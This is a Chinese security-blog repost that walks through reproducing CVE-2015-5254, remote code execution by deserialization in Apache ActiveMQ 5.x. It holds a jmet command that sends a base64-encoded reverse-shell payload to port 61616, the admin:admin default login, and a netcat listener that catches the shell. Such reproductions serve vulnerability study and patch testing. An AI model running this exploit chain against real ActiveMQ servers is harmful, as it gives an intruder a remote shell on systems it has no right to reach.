CVE-2015-5254 ActiveMQ 反序列化漏洞

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现 CVE-2015-5254 ActiveMQ 反序列化漏洞

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

 Apache ActiveMQ是由美国阿帕奇(Apache)软件基金会开发的开源消息中间件,支持Java消息服务、集群、Spring框架等。属于消息队列组件(消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等)。

    ApacheActive MQ5.13.0版本之前到5.x版本的安全漏洞,该程序引起的漏洞不限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化Java消息服务(JMS) ObjectMessage对象,利用该漏洞执行任意代码。

图片[1]-CVE-2015-5254 ActiveMQ 反序列化漏洞-安全小天地

0x03 漏洞复现

漏洞版本:

  • Apache ActiveMQ 5.x ~ Apache ActiveMQ 5.13.0

1.使用jmet-0.1.0-all.jar工具将有效负载发送到目标IP的61616端口

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y \"bash -c {echo,YmFzaCAtaSA+JiAv
图片[2]-CVE-2015-5254 ActiveMQ 反序列化漏洞-安全小天地

2. 通过admin:admin弱口令进入管理端

 Queues → eventjia → 点击Message ID下的队列消息即可
图片[3]-CVE-2015-5254 ActiveMQ 反序列化漏洞-安全小天地

3. nc监听得到一个shell

nc.exe -lvvp 7777
------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞6 分享
评论 抢沙发
头像
善语结善缘,恶语伤人心
提交
头像

昵称

取消
昵称常用语 夸夸
夸夸
还有吗!没看够!
表情图片

    暂无评论内容